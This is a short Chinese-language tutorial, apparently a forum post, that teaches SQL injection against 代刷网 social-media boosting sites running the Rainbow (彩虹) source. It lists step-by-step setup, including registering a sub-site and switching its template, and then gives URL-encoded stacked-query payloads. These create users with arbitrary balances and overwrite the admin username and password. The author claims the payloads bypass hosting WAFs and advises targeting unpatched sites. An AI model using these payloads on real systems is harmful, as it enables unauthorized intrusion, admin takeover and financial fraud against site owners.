好的兄弟们,今天来教大家代刷网的sql注入漏洞
首先,大家先去找一个代刷网的网站(不要找卖挂的了,大部分卖g的已经听到风声修复了)
然后注册一个分站
进入分站后台
然后选择网站信息设置
把自定义分站模板改成argon
然后去到你分站链接是首页
然后打上payload(文末提供)
如http://a.cn/
加上payload(举个例子)就是
http://a.cn/?cid=1;insert%20into%20pre_site%20set%20zid='01124'%2Cuser='gainxy'%2Cpwd='031124'%2Crmb='115.5'%2Cstatus='1'
然后访问就好了
接下来我给你们payload(能够绕过服务器商自带的waf和彩虹源码自带的防火墙)
1.创建用户
?cid=1;replace%20into%20pre_site%20set%20zid='数字(随便写)'%2Cuser='用户名'%2Cpwd='密码'%2Crmb='余额'%2Cstatus='1'
2.修改后台密码(需要知道后台路径)
依次执行
①?cid=1;replace%20into%20pre_config%20(k%2Cv)%20values%20(%27admin_pwd%27%2C%27密码%27)
②?cid=1;replace%20into%20pre_config%20(k%2Cv)%20values%20(%27admin_user%27%2C%27账号%27)
③?cid=1;replace%20into%20pre_cache%20(k%2Cv)%20values%20(%27config%27%2C%27a%27)
注意:不知道后台路径的进后台方法暂时不分享,是sql与xss结合,到时候我再发